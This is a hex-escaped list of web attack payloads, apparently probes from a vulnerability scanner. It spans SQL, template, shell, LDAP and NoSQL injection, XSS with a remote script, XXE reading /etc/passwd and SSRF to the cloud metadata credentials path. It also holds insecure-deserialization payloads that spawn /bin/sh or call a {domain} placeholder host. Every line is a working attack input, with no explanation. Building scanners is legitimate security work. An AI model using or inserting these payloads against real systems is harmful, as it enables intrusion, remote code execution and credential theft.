\x27\x41\x4e\x44\x20\x31\x3d\x43\x4f\x4e\x56\x45\x52\x54\x28\x69\x6e\x74\x2c\x40\x40\x76\x65\x72\x73\x69\x6f\x6e\x29\x2d\x2d\x2f\x2a\x27\x4f\x52\x20\x31\x3d\x65\x78\x74\x72\x61\x63\x74\x76\x61\x6c\x75\x65\x28\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x37\x65\x2c\x76\x65\x72\x73\x69\x6f\x6e\x28\x29\x29\x29\x2d\x2d\x2a\x2f\x22\x4f\x52\x20\x43\x41\x53\x54\x28\x76\x65\x72\x73\x69\x6f\x6e\x28\x29\x20\x41\x53\x20\x69\x6e\x74\x29\x2d\x2d
\x27\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x37\x2a\x31\x39\x31\x2d\x2d\x2f\x2a\x27\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x37\x2a\x31\x39\x31\x2c\x37\x2a\x31\x39\x31\x2d\x2d\x2a\x2f\x22\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x37\x2a\x31\x39\x31\x2c\x37\x2a\x31\x39\x31\x2c\x37\x2a\x31\x39\x31\x2d\x2d
\x53\x4c\x45\x45\x50\x28\x35\x29\x2f\x2a\x27\x58\x4f\x52\x28\x49\x46\x28\x31\x3d\x31\x2c\x53\x4c\x45\x45\x50\x28\x35\x29\x2c\x30\x29\x29\x4f\x52\x27\x22\x58\x4f\x52\x28\x49\x46\x28\x31\x3d\x31\x2c\x53\x4c\x45\x45\x50\x28\x35\x29\x2c\x30\x29\x29\x4f\x52\x22\x2a\x2f
\x27\x3b\x45\x58\x45\x43\x20\x6d\x61\x73\x74\x65\x72\x2e\x2e\x78\x70\x5f\x64\x69\x72\x74\x72\x65\x65\x20\x27\x5c\x5c\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x5c\x61\x27\x2d\x2d\x2f\x2a\x27\x4f\x52\x20\x4c\x4f\x41\x44\x5f\x46\x49\x4c\x45\x28\x27\x5c\x5c\x5c\x5c\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x5c\x5c\x61\x27\x29\x4f\x52\x27\x2a\x2f\x22\x4f\x52\x28\x53\x45\x4c\x45\x43\x54\x20\x64\x62\x6c\x69\x6e\x6b\x5f\x73\x65\x6e\x64\x5f\x71\x75\x65\x72\x79\x28\x27\x68\x6f\x73\x74\x3d\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x27\x2c\x27\x53\x45\x4c\x45\x43\x54\x20\x31\x27\x29\x29\x2d\x2d
\x7b\x7b\x37\x2a\x31\x39\x31\x7d\x7d\x24\x7b\x37\x2a\x31\x39\x31\x7d\x3c\x25\x3d\x20\x37\x2a\x31\x39\x31\x20\x25\x3e\x24\x7b\x7b\x37\x2a\x31\x39\x31\x7d\x7d\x23\x7b\x37\x2a\x31\x39\x31\x7d\x23\x73\x65\x74\x28\x24\x78\x3d\x37\x2a\x31\x39\x31\x29\x24\x78\x5b\x3d\x37\x2a\x31\x39\x31\x5d\x40\x28\x37\x2a\x31\x39\x31\x29
\x24\x7b\x7b\x3c\x25\x5b\x25\x27\x22\x7d\x7d\x25\x5c
\x7b\x7b\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x74\x69\x6d\x65\x27\x29\x2e\x73\x6c\x65\x65\x70\x28\x35\x29\x7d\x7d\x24\x7b\x54\x28\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x65\x61\x64\x29\x2e\x73\x6c\x65\x65\x70\x28\x35\x30\x30\x30\x29\x7d\x3c\x25\x3d\x20\x73\x6c\x65\x65\x70\x28\x35\x29\x20\x25\x3e\x24\x7b\x7b\x54\x28\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x65\x61\x64\x29\x2e\x73\x6c\x65\x65\x70\x28\x35\x30\x30\x30\x29\x7d\x7d
\x7b\x7b\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x27\x29\x2e\x72\x65\x71\x75\x65\x73\x74\x2e\x75\x72\x6c\x6f\x70\x65\x6e\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x73\x73\x74\x69\x27\x29\x7d\x7d\x24\x7b\x54\x28\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x29\x2e\x6e\x65\x77\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x73\x73\x74\x69\x27\x29\x2e\x6f\x70\x65\x6e\x53\x74\x72\x65\x61\x6d\x28\x29\x7d\x3c\x25\x3d\x20\x72\x65\x71\x75\x69\x72\x65\x28\x27\x6e\x65\x74\x2f\x68\x74\x74\x70\x27\x29\x3b\x4e\x65\x74\x3a\x3a\x48\x54\x54\x50\x2e\x67\x65\x74\x28\x55\x52\x49\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x73\x73\x74\x69\x27\x29\x29\x20\x25\x3e
\x3b\x73\x6c\x65\x65\x70\x20\x35\x20\x23\x27\x7c\x73\x6c\x65\x65\x70\x20\x35\x7c\x22\x24\x28\x73\x6c\x65\x65\x70\x20\x35\x29\x60\x73\x6c\x65\x65\x70\x20\x35\x60
\x3b\x65\x63\x68\x6f\x20\x24\x28\x28\x37\x2a\x31\x39\x31\x29\x29\x20\x23\x27\x7c\x65\x78\x70\x72\x20\x37\x20\x5c\x2a\x20\x31\x39\x31\x7c\x22\x24\x28\x65\x63\x68\x6f\x20\x24\x28\x28\x37\x2a\x31\x39\x31\x29\x29\x29\x60\x65\x78\x70\x72\x20\x37\x20\x5c\x2a\x20\x31\x39\x31\x60
\x3b\x6e\x73\x6c\x6f\x6f\x6b\x75\x70\x20\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x20\x23\x27\x7c\x6e\x73\x6c\x6f\x6f\x6b\x75\x70\x20\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x7c\x22\x24\x28\x6e\x73\x6c\x6f\x6f\x6b\x75\x70\x20\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x29\x60\x6e\x73\x6c\x6f\x6f\x6b\x75\x70\x20\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x60
\x37\x2a\x31\x39\x31
\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x74\x69\x6d\x65\x27\x29\x2e\x73\x6c\x65\x65\x70\x28\x35\x29
\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x27\x29\x2e\x72\x65\x71\x75\x65\x73\x74\x2e\x75\x72\x6c\x6f\x70\x65\x6e\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x70\x79\x65\x76\x61\x6c\x27\x29
\x27\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x33\x33\x37\x29\x3e\x3c\x21\x2d\x2d
\x27\x22\x3e\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x78\x2e\x6a\x73\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x78\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x33\x33\x37\x29\x3e\x3c\x21\x2d\x2d
\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f\x3e\x3c\x21\x44\x4f\x43\x54\x59\x50\x45\x20\x66\x6f\x6f\x20\x5b\x3c\x21\x45\x4e\x54\x49\x54\x59\x20\x78\x78\x65\x20\x53\x59\x53\x54\x45\x4d\x20\x22\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x22\x3e\x5d\x3e\x3c\x66\x6f\x6f\x3e\x26\x78\x78\x65\x3b\x3c\x2f\x66\x6f\x6f\x3e
\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f\x3e\x3c\x21\x44\x4f\x43\x54\x59\x50\x45\x20\x66\x6f\x6f\x20\x5b\x3c\x21\x45\x4e\x54\x49\x54\x59\x20\x78\x78\x65\x20\x53\x59\x53\x54\x45\x4d\x20\x22\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x78\x78\x65\x22\x3e\x5d\x3e\x3c\x66\x6f\x6f\x3e\x26\x78\x78\x65\x3b\x3c\x2f\x66\x6f\x6f\x3e
\x68\x74\x74\x70\x3a\x2f\x2f\x31\x36\x39\x2e\x32\x35\x34\x2e\x31\x36\x39\x2e\x32\x35\x34\x2f\x6c\x61\x74\x65\x73\x74\x2f\x6d\x65\x74\x61\x2d\x64\x61\x74\x61\x2f\x69\x61\x6d\x2f\x73\x65\x63\x75\x72\x69\x74\x79\x2d\x63\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x2f
\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x73\x73\x72\x66
\x68\x74\x74\x70\x73\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x73\x73\x72\x66
\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64
\x72\x65\x74\x75\x72\x6e\x20\x37\x2a\x31\x39\x31
\x7b\x22\x24\x67\x74\x22\x3a\x22\x22\x2c\x22\x24\x6e\x65\x22\x3a\x22\x22\x7d
\x24\x7b\x37\x2a\x31\x39\x31\x7d
\x7b\x22\x5f\x5f\x70\x72\x6f\x74\x6f\x5f\x5f\x22\x3a\x7b\x22\x70\x6f\x6c\x6c\x75\x74\x65\x64\x22\x3a\x31\x33\x33\x37\x7d\x7d
\x25\x30\x64\x25\x30\x61\x58\x2d\x49\x6e\x6a\x65\x63\x74\x65\x64\x3a\x31\x33\x33\x37\x25\x30\x64\x25\x30\x61
\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73
\x3c\x21\x2d\x2d\x23\x73\x65\x74\x20\x76\x61\x72\x3d\x22\x78\x22\x20\x76\x61\x6c\x75\x65\x3d\x22\x31\x33\x33\x37\x22\x20\x2d\x2d\x3e\x3c\x21\x2d\x2d\x23\x65\x63\x68\x6f\x20\x76\x61\x72\x3d\x22\x78\x22\x20\x2d\x2d\x3e
\x2a\x29\x28\x63\x6e\x3d\x2a\x29\x29\x28\x7c\x28\x63\x6e\x3d\x2a
\x2a\x29\x28\x75\x69\x64\x3d\x31\x33\x33\x37\x29\x28\x26\x28\x6f\x62\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x3d\x2a
\x3c\x78\x73\x6c\x3a\x76\x61\x6c\x75\x65\x2d\x6f\x66\x20\x73\x65\x6c\x65\x63\x74\x3d\x22\x37\x2a\x31\x39\x31\x22\x2f\x3e
\x3c\x78\x73\x6c\x3a\x76\x61\x6c\x75\x65\x2d\x6f\x66\x20\x73\x65\x6c\x65\x63\x74\x3d\x22\x64\x6f\x63\x75\x6d\x65\x6e\x74\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x78\x73\x6c\x74\x27\x29\x22\x2f\x3e
\x3c\x78\x73\x6c\x3a\x69\x6e\x76\x61\x6c\x69\x64\x2f\x3e
\x7b\x22\x71\x75\x65\x72\x79\x22\x3a\x7b\x22\x69\x6e\x76\x61\x6c\x69\x64\x5f\x71\x75\x65\x72\x79\x5f\x74\x79\x70\x65\x22\x3a\x7b\x7d\x7d\x7d
\x7b\x22\x73\x63\x72\x69\x70\x74\x5f\x66\x69\x65\x6c\x64\x73\x22\x3a\x7b\x22\x78\x22\x3a\x7b\x22\x73\x63\x72\x69\x70\x74\x22\x3a\x22\x37\x2a\x31\x39\x31\x22\x7d\x7d\x7d
\x27\x20\x4f\x52\x20\x31\x3d\x31\x20\x52\x45\x54\x55\x52\x4e\x20\x37\x2a\x31\x39\x31\x20\x2f\x2f
\x27\x20\x4f\x52\x20\x31\x3d\x31\x20\x57\x49\x54\x48\x20\x31\x20\x41\x53\x20\x78\x20\x43\x41\x4c\x4c\x20\x61\x70\x6f\x63\x2e\x75\x74\x69\x6c\x2e\x73\x6c\x65\x65\x70\x28\x35\x30\x30\x30\x29\x20\x52\x45\x54\x55\x52\x4e\x20\x78\x20\x2f\x2f
\x7b\x22\x73\x65\x6c\x65\x63\x74\x6f\x72\x22\x3a\x7b\x22\x24\x69\x6e\x76\x61\x6c\x69\x64\x5f\x6f\x70\x22\x3a\x22\x74\x65\x73\x74\x22\x7d\x7d
\x6e\x65\x77\x20\x47\x72\x6f\x6f\x76\x79\x53\x68\x65\x6c\x6c\x28\x29\x2e\x65\x76\x61\x6c\x75\x61\x74\x65\x28\x27\x37\x2a\x31\x39\x31\x27\x29
\x54\x68\x72\x65\x61\x64\x2e\x73\x6c\x65\x65\x70\x28\x35\x30\x30\x30\x29
\x6e\x65\x77\x20\x55\x52\x4c\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x67\x72\x6f\x6f\x76\x79\x27\x29\x2e\x74\x65\x78\x74
\x59\x31\x39\x66\x59\x6e\x56\x70\x62\x48\x52\x70\x62\x6c\x39\x66\x43\x6d\x56\x32\x59\x57\x77\x4b\x4b\x46\x4d\x6e\x4d\x53\x38\x77\x4a\x77\x70\x30\x55\x69\x34\x3d
\x59\x31\x39\x66\x59\x6e\x56\x70\x62\x48\x52\x70\x62\x6c\x39\x66\x43\x6d\x56\x32\x59\x57\x77\x4b\x4b\x46\x4d\x6e\x4e\x79\x6f\x78\x4f\x54\x45\x6e\x43\x6e\x52\x53\x4c\x67\x3d\x3d
\x59\x33\x52\x70\x62\x57\x55\x4b\x63\x32\x78\x6c\x5a\x58\x41\x4b\x4b\x45\x6b\x31\x43\x6e\x52\x53\x4c\x67\x3d\x3d
\x59\x31\x39\x66\x59\x6e\x56\x70\x62\x48\x52\x70\x62\x6c\x39\x66\x43\x6d\x56\x32\x59\x57\x77\x4b\x4b\x46\x4d\x6e\x58\x31\x39\x70\x62\x58\x42\x76\x63\x6e\x52\x66\x58\x79\x67\x69\x64\x58\x4a\x73\x62\x47\x6c\x69\x4c\x6e\x4a\x6c\x63\x58\x56\x6c\x63\x33\x51\x69\x4b\x53\x35\x79\x5a\x58\x46\x31\x5a\x58\x4e\x30\x4c\x6e\x56\x79\x62\x47\x39\x77\x5a\x57\x34\x6f\x49\x6d\x68\x30\x64\x48\x41\x36\x4c\x79\x39\x37\x5a\x47\x39\x74\x59\x57\x6c\x75\x66\x53\x39\x77\x61\x57\x4e\x72\x62\x47\x55\x69\x4b\x53\x63\x4b\x64\x46\x49\x75
\x21\x21\x70\x79\x74\x68\x6f\x6e\x2f\x6f\x62\x6a\x65\x63\x74\x2f\x61\x70\x70\x6c\x79\x3a\x62\x75\x69\x6c\x74\x69\x6e\x73\x2e\x65\x76\x61\x6c\x20\x5b\x22\x31\x2f\x30\x22\x5d
\x21\x21\x70\x79\x74\x68\x6f\x6e\x2f\x6f\x62\x6a\x65\x63\x74\x2f\x61\x70\x70\x6c\x79\x3a\x62\x75\x69\x6c\x74\x69\x6e\x73\x2e\x65\x76\x61\x6c\x20\x5b\x22\x37\x2a\x31\x39\x31\x22\x5d
\x21\x21\x70\x79\x74\x68\x6f\x6e\x2f\x6f\x62\x6a\x65\x63\x74\x2f\x61\x70\x70\x6c\x79\x3a\x74\x69\x6d\x65\x2e\x73\x6c\x65\x65\x70\x20\x5b\x35\x5d
\x21\x21\x70\x79\x74\x68\x6f\x6e\x2f\x6f\x62\x6a\x65\x63\x74\x2f\x61\x70\x70\x6c\x79\x3a\x62\x75\x69\x6c\x74\x69\x6e\x73\x2e\x65\x78\x65\x63\x20\x5b\x22\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x3b\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x2e\x75\x72\x6c\x6f\x70\x65\x6e\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x79\x61\x6d\x6c\x27\x29\x22\x5d
\x7b\x22\x70\x79\x2f\x72\x65\x64\x75\x63\x65\x22\x3a\x5b\x7b\x22\x70\x79\x2f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x22\x3a\x22\x62\x75\x69\x6c\x74\x69\x6e\x73\x2e\x65\x76\x61\x6c\x22\x7d\x2c\x7b\x22\x70\x79\x2f\x74\x75\x70\x6c\x65\x22\x3a\x5b\x22\x31\x2f\x30\x22\x5d\x7d\x5d\x7d
\x7b\x22\x70\x79\x2f\x72\x65\x64\x75\x63\x65\x22\x3a\x5b\x7b\x22\x70\x79\x2f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x22\x3a\x22\x62\x75\x69\x6c\x74\x69\x6e\x73\x2e\x65\x76\x61\x6c\x22\x7d\x2c\x7b\x22\x70\x79\x2f\x74\x75\x70\x6c\x65\x22\x3a\x5b\x22\x37\x2a\x31\x39\x31\x22\x5d\x7d\x5d\x7d
\x7b\x22\x70\x79\x2f\x72\x65\x64\x75\x63\x65\x22\x3a\x5b\x7b\x22\x70\x79\x2f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x22\x3a\x22\x74\x69\x6d\x65\x2e\x73\x6c\x65\x65\x70\x22\x7d\x2c\x7b\x22\x70\x79\x2f\x74\x75\x70\x6c\x65\x22\x3a\x5b\x35\x5d\x7d\x5d\x7d
\x7b\x22\x70\x79\x2f\x72\x65\x64\x75\x63\x65\x22\x3a\x5b\x7b\x22\x70\x79\x2f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x22\x3a\x22\x62\x75\x69\x6c\x74\x69\x6e\x73\x2e\x65\x76\x61\x6c\x22\x7d\x2c\x7b\x22\x70\x79\x2f\x74\x75\x70\x6c\x65\x22\x3a\x5b\x22\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x27\x29\x2e\x72\x65\x71\x75\x65\x73\x74\x2e\x75\x72\x6c\x6f\x70\x65\x6e\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x6a\x73\x6f\x6e\x70\x69\x63\x6b\x6c\x65\x27\x29\x22\x5d\x7d\x5d\x7d
\x7b\x22\x72\x63\x65\x22\x3a\x22\x5f\x24\x24\x4e\x44\x5f\x46\x55\x4e\x43\x24\x24\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x74\x68\x72\x6f\x77\x20\x6e\x65\x77\x20\x45\x72\x72\x6f\x72\x28\x31\x33\x33\x37\x29\x7d\x28\x29\x22\x7d
\x7b\x22\x72\x63\x65\x22\x3a\x22\x5f\x24\x24\x4e\x44\x5f\x46\x55\x4e\x43\x24\x24\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x37\x2a\x31\x39\x31\x7d\x28\x29\x22\x7d
\x7b\x22\x72\x63\x65\x22\x3a\x22\x5f\x24\x24\x4e\x44\x5f\x46\x55\x4e\x43\x24\x24\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x76\x61\x72\x20\x64\x3d\x44\x61\x74\x65\x2e\x6e\x6f\x77\x28\x29\x2b\x35\x30\x30\x30\x3b\x77\x68\x69\x6c\x65\x28\x44\x61\x74\x65\x2e\x6e\x6f\x77\x28\x29\x3c\x64\x29\x7b\x7d\x7d\x28\x29\x22\x7d
\x7b\x22\x72\x63\x65\x22\x3a\x22\x5f\x24\x24\x4e\x44\x5f\x46\x55\x4e\x43\x24\x24\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x71\x75\x69\x72\x65\x28\x27\x68\x74\x74\x70\x27\x29\x2e\x67\x65\x74\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x6e\x6f\x64\x65\x73\x65\x72\x27\x29\x7d\x28\x29\x22\x7d
\x21\x21\x69\x6e\x76\x61\x6c\x69\x64\x5f\x74\x61\x67\x5f\x70\x72\x6f\x62\x65\x20\x31\x33\x33\x37
\x7b\x22\x66\x6e\x22\x3a\x7b\x22\x5f\x5f\x6a\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x22\x3a\x22\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x37\x2a\x31\x39\x31\x7d\x22\x7d\x7d
\x4f\x3a\x39\x39\x39\x39\x3a\x22\x4e\x6f\x6e\x45\x78\x69\x73\x74\x22\x3a\x30\x3a\x7b\x7d
\x2d\x2d\x2d\x20\x21\x72\x75\x62\x79\x2f\x6f\x62\x6a\x65\x63\x74\x3a\x4e\x6f\x6e\x45\x78\x69\x73\x74\x65\x6e\x74\x43\x6c\x61\x73\x73\x31\x33\x33\x37\x5c\x6e\x69\x3a\x20\x78
\x42\x41\x6a\x2f\x41\x41\x41\x41
\x63\x48\x4e\x30\x4d\x50\x2f\x2f\x2f\x77\x51\x41
\x2d\x2d\x2d\x20\x7b\x7b\x7b\x69\x6e\x76\x61\x6c\x69\x64\x20\x79\x61\x6d\x6c\x20\x31\x33\x33\x37
\x72\x4f\x30\x41\x42\x58\x4e\x79\x41\x42\x46\x71\x59\x58\x5a\x68\x4c\x6e\x56\x30\x61\x57\x77\x75\x53\x47\x46\x7a\x61\x46\x4e\x6c\x64\x41\x3d\x3d
\x21\x21\x63\x6f\x6d\x2e\x6e\x6f\x6e\x65\x78\x69\x73\x74\x65\x6e\x74\x2e\x46\x61\x6b\x65\x43\x6c\x61\x73\x73\x31\x33\x33\x37\x20\x7b\x7d
\x5b\x22\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c\x22\x2c\x7b\x22\x74\x72\x61\x6e\x73\x6c\x65\x74\x42\x79\x74\x65\x63\x6f\x64\x65\x73\x22\x3a\x5b\x22\x79\x76\x36\x36\x76\x67\x3d\x3d\x22\x5d\x2c\x22\x74\x72\x61\x6e\x73\x6c\x65\x74\x4e\x61\x6d\x65\x22\x3a\x22\x61\x22\x2c\x22\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x22\x3a\x7b\x7d\x7d\x5d
\x7b\x22\x40\x74\x79\x70\x65\x22\x3a\x22\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c\x22\x2c\x22\x5f\x62\x79\x74\x65\x63\x6f\x64\x65\x73\x22\x3a\x5b\x22\x79\x76\x36\x36\x76\x67\x3d\x3d\x22\x5d\x2c\x22\x5f\x6e\x61\x6d\x65\x22\x3a\x22\x61\x22\x2c\x22\x5f\x74\x66\x61\x63\x74\x6f\x72\x79\x22\x3a\x7b\x7d\x2c\x22\x5f\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x22\x3a\x7b\x7d\x7d
\x7b\x22\x40\x74\x79\x70\x65\x22\x3a\x22\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x49\x6e\x65\x74\x41\x64\x64\x72\x65\x73\x73\x22\x2c\x22\x76\x61\x6c\x22\x3a\x22\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x22\x7d
\x3c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x50\x72\x6f\x63\x65\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3e\x3c\x63\x6f\x6d\x6d\x61\x6e\x64\x3e\x3c\x73\x74\x72\x69\x6e\x67\x3e\x6e\x73\x6c\x6f\x6f\x6b\x75\x70\x3c\x2f\x73\x74\x72\x69\x6e\x67\x3e\x3c\x73\x74\x72\x69\x6e\x67\x3e\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x3c\x2f\x73\x74\x72\x69\x6e\x67\x3e\x3c\x2f\x63\x6f\x6d\x6d\x61\x6e\x64\x3e\x3c\x2f\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x50\x72\x6f\x63\x65\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3e
\x3c\x6a\x61\x76\x61\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x38\x2e\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x6a\x61\x76\x61\x2e\x62\x65\x61\x6e\x73\x2e\x58\x4d\x4c\x44\x65\x63\x6f\x64\x65\x72\x22\x3e\x3c\x6f\x62\x6a\x65\x63\x74\x20\x63\x6c\x61\x73\x73\x3d\x22\x63\x6f\x6d\x2e\x6e\x6f\x6e\x65\x78\x69\x73\x74\x65\x6e\x74\x2e\x46\x61\x6b\x65\x31\x33\x33\x37\x22\x2f\x3e\x3c\x2f\x6a\x61\x76\x61\x3e
\x3c\x6a\x61\x76\x61\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x38\x2e\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x6a\x61\x76\x61\x2e\x62\x65\x61\x6e\x73\x2e\x58\x4d\x4c\x44\x65\x63\x6f\x64\x65\x72\x22\x3e\x3c\x6f\x62\x6a\x65\x63\x74\x20\x63\x6c\x61\x73\x73\x3d\x22\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x50\x72\x6f\x63\x65\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x22\x3e\x3c\x61\x72\x72\x61\x79\x20\x63\x6c\x61\x73\x73\x3d\x22\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x22\x20\x6c\x65\x6e\x67\x74\x68\x3d\x22\x33\x22\x3e\x3c\x76\x6f\x69\x64\x20\x69\x6e\x64\x65\x78\x3d\x22\x30\x22\x3e\x3c\x73\x74\x72\x69\x6e\x67\x3e\x2f\x62\x69\x6e\x2f\x73\x68\x3c\x2f\x73\x74\x72\x69\x6e\x67\x3e\x3c\x2f\x76\x6f\x69\x64\x3e\x3c\x76\x6f\x69\x64\x20\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x3e\x3c\x73\x74\x72\x69\x6e\x67\x3e\x2d\x63\x3c\x2f\x73\x74\x72\x69\x6e\x67\x3e\x3c\x2f\x76\x6f\x69\x64\x3e\x3c\x76\x6f\x69\x64\x20\x69\x6e\x64\x65\x78\x3d\x22\x32\x22\x3e\x3c\x73\x74\x72\x69\x6e\x67\x3e\x65\x78\x70\x72\x20\x37\x20\x5c\x2a\x20\x31\x39\x31\x3c\x2f\x73\x74\x72\x69\x6e\x67\x3e\x3c\x2f\x76\x6f\x69\x64\x3e\x3c\x2f\x61\x72\x72\x61\x79\x3e\x3c\x76\x6f\x69\x64\x20\x6d\x65\x74\x68\x6f\x64\x3d\x22\x73\x74\x61\x72\x74\x22\x2f\x3e\x3c\x2f\x6f\x62\x6a\x65\x63\x74\x3e\x3c\x2f\x6a\x61\x76\x61\x3e
